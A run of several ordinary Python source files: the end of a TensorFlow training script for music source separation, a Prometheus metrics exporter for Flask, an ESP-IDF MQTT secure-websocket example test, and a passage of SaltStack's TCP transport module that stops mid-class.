separator_loss, var_list=separator_vars, colocate_gradients_with_ops=True)
else:
with tf.variable_scope("separator_solver"):
sup_separator_solver = (tf.train.AdamOptimizer(learning_rate=sup_sep_lr).minimize(sup_separator_loss, var_list=separator_vars, colocate_gradients_with_ops=True))
# SUMMARIES FOR DISCRIMINATORS AND LOSSES
acc_disc_summaries = tf.summary.merge_all(key="acc_disc")
drums_disc_summaries = tf.summary.merge_all(key="drums_disc")
tf.summary.scalar("sup_sep_loss", sup_separator_loss, collections=['sup', "unsup"])
tf.summary.scalar("unsup_sep_loss", unsup_separator_loss, collections=['unsup'])
tf.summary.scalar("sep_loss", separator_loss, collections=["sup", "unsup"])
sup_summaries = tf.summary.merge_all(key='sup')
unsup_summaries = tf.summary.merge_all(key='unsup')
# Start session
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(model_config["log_dir"] + os.path.sep + model_folder, graph=sess.graph)
# CHECKPOINTING
# Load pretrained model to continue training, if we are supposed to
if load_model is not None:
restorer = tf.train.Saver(tf.global_variables(), write_version=tf.train.SaverDef.V2)
print("Num of variables: " + str(len(tf.global_variables())))
restorer.restore(sess, load_model)
print('Pre-trained model restored from file ' + load_model)
saver = tf.train.Saver(tf.global_variables(), write_version=tf.train.SaverDef.V2)
# Start training loop
run = True
_global_step = sess.run(global_step)
_init_step = _global_step
it = 0
while run:
if unsup_dataset is not None:
# TRAIN DISCRIMINATORS
for disc_it in range(model_config["num_disc"]):
batches = list()
for gen in unsup_batch_gens:
batches.append(gen.get_batch())
_, _acc_disc_summaries = sess.run(
[acc_disc_solver, acc_disc_summaries],
feed_dict={mix_context_u: batches[0], acc_u: batches[1]}
)
_, _drums_disc_summaries = sess.run(
[drums_disc_solver, drums_disc_summaries],
feed_dict={mix_context_u: batches[0], drums_u: batches[2]}
)
writer.add_summary(_acc_disc_summaries, global_step=it)
writer.add_summary(_drums_disc_summaries, global_step=it)
it += 1
# TRAIN SEPARATOR
sup_batch = sup_batch_gen.get_batch()
if unsup_dataset is not None:
# SUP + UNSUPERVISED TRAINING
unsup_batches = list()
for gen in unsup_batch_gens:
unsup_batches.append(gen.get_batch())
_, _unsup_summaries, _sup_summaries = sess.run(
[unsup_separator_solver, unsup_summaries, sup_summaries],
feed_dict={mix_context: sup_batch[0], acc: sup_batch[1], drums: sup_batch[2],
mix_context_u: unsup_batches[0], acc_u:unsup_batches[1], drums_u:unsup_batches[2]}
)
writer.add_summary(_unsup_summaries, global_step=_global_step)
else:
# PURELY SUPERVISED TRAINING
_, _sup_summaries = sess.run(
[sup_separator_solver, sup_summaries],
feed_dict={mix_context: sup_batch[0], acc: sup_batch[1], drums: sup_batch[2]})
writer.add_summary(_sup_summaries, global_step=_global_step)
# Increment step counter, check if maximum iterations per epoch is achieved and stop in that case
_global_step = sess.run(increment_global_step)
if _global_step - _init_step > model_config["epoch_it"]:
run = False
print("Finished training phase, stopping batch generators")
sup_batch_gen.stop_workers()
if unsup_dataset is not None:
for gen in unsup_batch_gens:
gen.stop_workers()
# Epoch finished - Save model
print("Finished epoch!")
save_path = saver.save(sess, model_config["model_base_dir"] + os.path.sep + model_folder + os.path.sep + model_folder, global_step=int(_global_step))
# Close session, clear computational graph
writer.flush()
writer.close()
sess.close()
tf.reset_default_graph()
return save_path
@ex.capture
def optimise(dataset, supervised):
'''
Performs either supervised or unsupervised training of the separation system.
Training stops if validation loss did not improve for a number of epochs, then final performance on test set is determined
:param dataset: Dataset dict containing the supervised, unsupervised, valiation and test partition
:param supervised: Boolean, whether to train supervised or semi-supervised
:return: [path to checkpoint file of best model, test loss of best model]
'''
if supervised:
unsup_dataset = None
model_folder = str(experiment_id) + "_sup"
else:
model_folder = str(experiment_id) + "_semisup"
unsup_dataset = dataset["train_unsup"]
epoch = 0
best_loss = 10000
model_path = None
worse_epochs = 0
best_model_path = ""
while worse_epochs < 1: #TODO: change back to 1!
print("EPOCH: " + str(epoch))
model_path = train(sup_dataset=dataset["train_sup"], unsup_dataset=unsup_dataset, model_folder=model_folder, load_model=model_path)
curr_loss = test(audio_list=dataset["valid"], model_folder=model_folder, load_model=model_path)
epoch += 1
if curr_loss < best_loss:
worse_epochs = 0
print("Performance on validation set improved from " + str(best_loss) + " to " + str(curr_loss))
best_model_path = model_path
best_loss = curr_loss
else:
worse_epochs += 1
print("Performance on validation set worsened to " + str(curr_loss))
print("TRAINING FINISHED - TESTING WITH BEST MODEL " + best_model_path)
test_loss = test(audio_list=dataset["test"], model_folder=model_folder, load_model=best_model_path)
return best_model_path, test_loss
@ex.automain
def dsd_100_experiment(model_config):
# Set up data input
if os.path.exists('dataset.pkl'):
with open('dataset.pkl', 'r') as file:
dataset = pickle.load(file)
print("Loaded dataset from pickle!")
else:
'''
Create dataset structure comprised of supervised, unsupervised, validation and test partitions
# MODIFY BELOW TO INSERT DSD100, MedleyDB, CCMixter datasets.
# Each returned item from the dataset reading function (dsd_train, dsd_test, mdb, ccm, ikala) has to be of the following structure:
# List of 3 elements, each of which is a List of Sample objects (instantiations of the Sample class -
# you need to create these as part of your dataset reading function). Each sample represents an audio track
# The list of 3 elements has to be in order: A list of mixtures, accompaniments and drums, in that order.
# Example: dsd_train[1] - List of Sample objects, each sample object represents an accompaniment audio file
# The lists have to be matched: The mixture audio at dsd_train[0][20] has to have its accompaniment at dsd_train[1][20] and drums at dsd_train[2][20]
# This means that for iKala and MedleyDB you need to generate separate vocal and accompaniment audio manually first!
# For MedleyDB, we mix together stems with/without drums to generate the drum and accompaniment track respectively, then add those signals together for the mixture track, to ensure mix=acc+drums
_ '''
###################### MODIFY BELOW
# dsd_train, dsd_test = Datasets.getDSDFilelist("DSD100.xml")
# mdb = Datasets.getMedleyDB("MedleyDB.xml")
# ccm = Datasets.getCCMixter("CCMixter.xml")
# ikala = Datasets.getIKala("iKala.xml")
###################### MODIFY ABOVE
# Draw randomly from datasets
# dataset = dict()
# dataset["train_sup"] = dsd_train # 50 training tracks from DSD100 as supervised dataset
# dataset["train_unsup"] = [] # Initialise unsupervised dateaset structure (fill up later)
# dataset["valid"] = [dsd_test[0][:25], dsd_test[1][:25], dsd_test[2][:25]] # Validation and test contains 25 songs of DSD each, plus more (added later)
# dataset["test"] = [dsd_test[0][25:], dsd_test[1][25:], dsd_test[2][25:]]
# Go through MedleyDB, CCMixter, iKala
# for ds in [mdb, ccm, ikala]:
# num = len(ds[0]) // 3
# # Split dataset in three equal-sized parts, and assign each to the unsupervised dataset, validation and test dataset respectively
# for i in range(3):
# # Only add more examples to unsupervised and test sets, since in this experiment we care about preventing overfitting to the supervised dataset
# dataset["train_unsup"][i].extend(ds[i][:num])
# dataset["valid"][i].extend(ds[i][num:2 * num])
# dataset["test"][i].extend(ds[i][2 * num:])
### DELETE ALL OF THE ABOVE IF YOU WANT TO USE YOUR OWN DATASETS OR PARTITIONING,
### AND READ IN YOUR OWN DATASET OBJECTS ACCORDING TO THE RULES SHOWN ABOVE, THEN ASSIGN THEM TO THE DATASET DICT WITH
### ENTRIES train_sup, valid and test, RESPECTIVELY.
#Zip up all paired dataset partitions so we have (mixture, accompaniment, drums) tuples
# dataset["train_sup"] = zip(dataset["train_sup"][0], dataset["train_sup"][1], dataset["train_sup"][2])
# dataset["valid"] = zip(dataset["valid"][0], dataset["valid"][1], dataset["valid"][2])
# dataset["test"] = zip(dataset["test"][0], dataset["test"][1], dataset["test"][2])
# with open('dataset.pkl', 'wb') as file:
# pickle.dump(dataset, file)
# print("Created dataset structure")
# Optimize in a +supervised fashion until validation loss worsens
sup_model_path = "/home/ubuntu/AAS/checkpoints/111_sup/111_sup-3003"
# sup_model_path, sup_loss = optimise(dataset=dataset, supervised=True)
#print("Supervised training finished! Saved model at " + sup_model_path + ". Performance: " + str(sup_loss))
sup_scores = Test.bss_evaluate(model_config, dataset=dataset["test"],load_model=sup_model_path)
print(sup_scores)
# Train same network architecture semi-supervised
unsup_model_path, unsup_loss = optimise(dataset=dataset, supervised=False)
print("Unsupervised training finished! Performance: " + str(unsup_loss))
unsup_scores = Test.bss_evaluate(model_config, dataset=dataset["test"],load_model=unsup_model_path)
print(unsup_scores) |
__init__.py | import inspect
import functools
import threading
from timeit import default_timer
from flask import request, make_response
from flask import Flask, Response
from werkzeug.exceptions import HTTPException
from prometheus_client import Counter, Histogram, Gauge, Summary
from prometheus_client import generate_latest, CONTENT_TYPE_LATEST
from prometheus_client import REGISTRY as DEFAULT_REGISTRY
class PrometheusMetrics(object):
"""
Prometheus metrics export configuration for Flask.
The default metrics include a Histogram for HTTP request latencies
and number of HTTP requests plus a Counter for the total number
of HTTP requests.
Sample usage:
app = Flask(__name__)
metrics = PrometheusMetrics(app)
# static information as metric
metrics.info('app_info', 'Application info', version='1.0.3')
@app.route('/')
def main():
pass # requests tracked by default
@app.route('/skip')
@metrics.do_not_track()
def skip():
pass # default metrics are not collected
@app.route('/<item_type>')
@metrics.do_not_track()
@metrics.counter('invocation_by_type', 'Number of invocations by type',
labels={'item_type': lambda: request.view_args['type']})
def by_type(item_type):
pass # only the counter is collected, not the default metrics
@app.route('/long-running')
@metrics.gauge('in_progress', 'Long running requests in progress')
def long_running():
pass
@app.route('/status/<int:status>')
@metrics.do_not_track()
@metrics.summary('requests_by_status', 'Request latencies by status',
labels={'status': lambda r: r.status_code})
@metrics.histogram('requests_by_status_and_path', 'Request latencies by status and path',
labels={'status': lambda r: r.status_code, 'path': lambda: request.path})
def echo_status(status):
return 'Status: %s' % status, status
Label values can be defined as callables:
- With a single argument that will be the Flask Response object
- Without an argument, possibly to use with the Flask `request` object
"""
def __init__(self, app, path='/metrics', export_defaults=True,
buckets=None, registry=DEFAULT_REGISTRY):
"""
Create a new Prometheus metrics export configuration.
:param app: the Flask application
:param path: the metrics path (defaults to `/metrics`)
:param export_defaults: expose all HTTP request latencies
and number of HTTP requests
:param buckets: the time buckets for request latencies
(will use the default when `None`)
:param registry: the Prometheus Registry to use
"""
self.app = app
self.registry = registry
self.version = __version__
if path:
self.register_endpoint(path)
if export_defaults:
self.export_defaults(buckets)
def register_endpoint(self, path, app=None):
"""
Register the metrics endpoint on the Flask application.
:param path: the path of the endpoint
:param app: the Flask application to register the endpoint on
(by default it is the application registered with this class)
"""
if app is None:
app = self.app
@app.route(path)
@self.do_not_track()
def prometheus_metrics():
registry = self.registry
if 'name[]' in request.args:
registry = registry.restricted_registry(request.args.getlist('name[]'))
headers = {'Content-Type': CONTENT_TYPE_LATEST}
return generate_latest(registry), 200, headers
def start_http_server(self, port, host='0.0.0.0', endpoint='/metrics'):
"""
Start an HTTP server for exposing the metrics.
This will be an individual Flask application,
not the one registered with this class.
:param port: the HTTP port to expose the metrics endpoint on
:param host: the HTTP host to listen on (default: `0.0.0.0`)
:param endpoint: the URL path to expose the endpoint on
(default: `/metrics`)
"""
app = Flask('prometheus-flask-exporter-%d' % port)
self.register_endpoint(endpoint, app)
def run_app():
app.run(host=host, port=port)
thread = threading.Thread(target=run_app)
thread.setDaemon(True)
thread.start()
def export_defaults(self, buckets=None):
"""
Export the default metrics:
- HTTP request latencies
- Number of HTTP requests
:param buckets: the time buckets for request latencies
(will use the default when `None`)
"""
# use the default buckets from prometheus_client if not given here
buckets_as_kwargs = {}
if buckets is not None:
buckets_as_kwargs['buckets'] = buckets
histogram = Histogram(
'flask_http_request_duration_seconds',
'Flask HTTP request duration in seconds',
('method', 'path', 'status'),
registry=self.registry,
**buckets_as_kwargs
)
counter = Counter(
'flask_http_request_total',
'Total number of HTTP requests',
('method', 'status'),
registry=self.registry
)
self.info(
'flask_exporter_info',
'Information about the Prometheus Flask exporter',
version=self.version
)
def before_request():
request.prom_start_time = default_timer()
def after_request(response):
if hasattr(request, 'prom_do_not_track'):
return response
total_time = max(default_timer() - request.prom_start_time, 0)
histogram.labels(
request.method, request.path, response.status_code
).observe(total_time)
counter.labels(request.method, response.status_code).inc()
return response
self.app.before_request(before_request)
self.app.after_request(after_request)
def histogram(self, name, description, labels=None, **kwargs):
"""
Use a Histogram to track the execution time and invocation count
of the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Histogram
"""
return self._track(
Histogram,
lambda metric, time: metric.observe(time),
kwargs, name, description, labels,
registry=self.registry
)
def summary(self, name, description, labels=None, **kwargs):
"""
Use a Summary to track the execution time and invocation count
of the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Summary
"""
return self._track(
Summary,
lambda metric, time: metric.observe(time),
kwargs, name, description, labels,
registry=self.registry
)
def gauge(self, name, description, labels=None, **kwargs):
"""
Use a Gauge to track the number of invocations in progress
for the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Gauge
"""
return self._track(
Gauge,
lambda metric, time: metric.dec(),
kwargs, name, description, labels,
registry=self.registry,
before=lambda metric: metric.inc()
)
def counter(self, name, description, labels=None, **kwargs):
"""
Use a Counter to track the total number of invocations of the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Counter
"""
return self._track(
Counter,
lambda metric, time: metric.inc(),
kwargs, name, description, labels,
registry=self.registry
)
@staticmethod
def _track(metric_type, metric_call, metric_kwargs, name, description, labels,
registry, before=None):
"""
Internal method decorator logic.
:param metric_type: the type of the metric from the `prometheus_client` library
:param metric_call: the invocation to execute as a callable with `(metric, time)`
:param metric_kwargs: additional keyword arguments for creating the metric
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param before: an optional callable to invoke before executing the
request handler method accepting the single `metric` argument
:param registry: the Prometheus Registry to use
"""
if labels is not None and not isinstance(labels, dict):
raise TypeError('labels needs to be a dictionary of {labelname: callable}')
label_names = labels.keys() if labels else tuple()
parent_metric = metric_type(
name, description, labelnames=label_names, registry=registry,
**metric_kwargs
)
def label_value(f):
if not callable(f):
return lambda x: f
if inspect.getargspec(f).args:
return lambda x: f(x)
else:
return lambda x: f()
label_generator = tuple(
(key, label_value(call))
for key, call in labels.items()
) if labels else tuple()
def get_metric(response):
if label_names:
return parent_metric.labels(
**{key: call(response) for key, call in label_generator}
)
else:
return parent_metric
def decorator(f):
@functools.wraps(f)
def func(*args, **kwargs):
if before:
metric = get_metric(None)
before(metric)
else:
metric = None
start_time = default_timer()
try:
response = f(*args, **kwargs)
except HTTPException as ex:
response = ex
except Exception as ex:
response = make_response('Exception: %s' % ex, 500)
total_time = max(default_timer() - start_time, 0)
if not metric:
response_for_metric = response
if not isinstance(response, Response):
if request.endpoint == f.__name__:
# we are in a request handler method
response_for_metric = make_response(response)
metric = get_metric(response_for_metric)
metric_call(metric, time=total_time)
return response
return func
return decorator
@staticmethod
def do_not_track():
"""
Decorator to skip the default metrics collection for the method.
*Note*: explicit metrics decorators will still collect the data
"""
def decorator(f):
@functools.wraps(f)
def func(*args, **kwargs):
request.prom_do_not_track = True
return f(*args, **kwargs)
return func
return decorator
def info(self, name, description, labelnames=None, labelvalues=None, **labels):
"""
Report any information as a Prometheus metric.
This will create a `Gauge` with the initial value of 1.
The easiest way to use it is:
metrics = PrometheusMetrics(app)
metrics.info(
'app_info', 'Application info',
version='1.0', major=1, minor=0
)
If the order of the labels matters:
metrics = PrometheusMetrics(app)
metrics.info(
'app_info', 'Application info',
('version', 'major', 'minor'),
('1.0', 1, 0)
)
:param name: the name of the metric
:param description: the description of the metric
:param labelnames: the names of the labels
:param labelvalues: the values of the labels
:param labels: the names and values of the labels
:return: the newly created `Gauge` metric
"""
if labels and labelnames:
raise ValueError(
'Cannot have labels defined as `dict` '
'and collections of names and values'
)
if labelnames is None and labels:
labelnames = labels.keys()
elif labelnames and labelvalues:
for idx, label_name in enumerate(labelnames):
labels[label_name] = labelvalues[idx]
gauge = Gauge(
name, description, labelnames,
registry=self.registry
)
if labels:
gauge = gauge.labels(**labels)
gauge.set(1)
return gauge
__version__ = '0.1.2'
|
mqtt_wss_example_test.py | from __future__ import unicode_literals
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import ssl
import paho.mqtt.client as mqtt
from threading import Thread, Event
try:
import IDF
except ImportError:
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
event_client_connected = Event()
event_stop_client = Event()
event_client_received_correct = Event()
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
event_client_connected.set()
client.subscribe("/topic/qos0")
def mqtt_client_task(client):
while not event_stop_client.is_set():
client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
global message_log
payload = msg.payload.decode()
if not event_client_received_correct.is_set() and payload == "data":
client.publish("/topic/qos0", "data_to_esp32")
if msg.topic == "/topic/qos0" and payload == "data":
event_client_received_correct.set()
message_log += "Received data:" + msg.topic + " " + payload + "\n"
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_wss(env, extra_data):
broker_url = ""
broker_port = 0
"""
steps: |
1. join AP and connects to wss broker
2. Test connects a client to the same broker
3. Test evaluates it received correct qos0 message
4. Test ESP32 client received correct qos0 message
"""
dut1 = env.get_dut("mqtt_websocket_secure", "examples/protocols/mqtt/wss")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_websocket_secure.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mqtt_websocket_secure_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mqtt_websocket_secure_size", bin_size // 1024)
# Look for host:port in sdkconfig
try:
value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
broker_url = value.group(1)
broker_port = int(value.group(2))
except Exception:
print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
raise
client = None
# 1. Test connects to a broker
try:
client = mqtt.Client(transport="websockets")
client.on_connect = on_connect
client.on_message = on_message
client.tls_set(None,
None,
None, cert_reqs=ssl.CERT_NONE, tls_version=ssl.PROTOCOL_TLSv1_2, ciphers=None)
print("Connecting...")
client.connect(broker_url, broker_port, 60)
except Exception:
print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
raise
# Starting a py-client in a separate thread
thread1 = Thread(target=mqtt_client_task, args=(client,))
thread1.start()
try:
print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
if not event_client_connected.wait(timeout=30):
raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
dut1.start_app()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
print('ENV_TEST_FAILURE: Cannot connect to AP')
raise
print("Checking py-client received msg published from esp...")
if not event_client_received_correct.wait(timeout=30):
raise ValueError('Wrong data received, msg log: {}'.format(message_log))
print("Checking esp-client received msg published from py-client...")
dut1.expect(re.compile(r"DATA=data_to_esp32"), timeout=30)
finally:
event_stop_client.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mqtt_wss()
|
tcp.py | # -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import msgpack
import socket
import os
import weakref
import time
import traceback
import errno
# Import Salt Libs
import salt.crypt
import salt.utils.async
import salt.utils.event
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import errno
import tornado.util
from salt.utils.process import SignalHandlingMultiprocessingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
'''
Ensure that TCP keepalives are set for the socket.
'''
if hasattr(socket, 'SO_KEEPALIVE'):
if opts.get('tcp_keepalive', False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, 'SOL_TCP'):
if hasattr(socket, 'TCP_KEEPIDLE'):
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE,
int(tcp_keepalive_idle))
if hasattr(socket, 'TCP_KEEPCNT'):
tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT,
int(tcp_keepalive_cnt))
if hasattr(socket, 'TCP_KEEPINTVL'):
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl))
if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
1, int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000)))
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingMultiprocessingProcess):
'''
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
'''
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, log_queue=None):
super(LoadBalancerServer, self).__init__(log_queue=log_queue)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['socket_queue'],
log_queue=state['log_queue']
)
def __getstate__(self):
return {'opts': self.opts,
'socket_queue': self.socket_queue,
'log_queue': self.log_queue}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
def __del__(self):
self.close()
def run(self):
'''
Start the load balancer
'''
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except socket.error as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to tcp.
Note: this class returns a singleton
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncTCPReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = obj
else:
log.debug('Re-using AsyncTCPReqChannel for %s', key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if 'master_uri' in kwargs:
opts['master_uri'] = kwargs['master_uri']
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
opts['master_uri'],
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get('resolver')
parse = urlparse.urlparse(self.opts['master_uri'])
master_host, master_port = parse.netloc.rsplit(':', 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={'io_loop': self.io_loop, 'resolver': resolver,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_ret_port')})
def close(self):
if self._closing:
return
self._closing = True
self.message_client.close()
def __del__(self):
self.close()
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
'''
@tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
try:
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError('Connection to master lost')
raise tornado.gen.Return(ret)
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.event = salt.utils.event.get_event(
'minion',
opts=self.opts,
listen=False
)
def close(self):
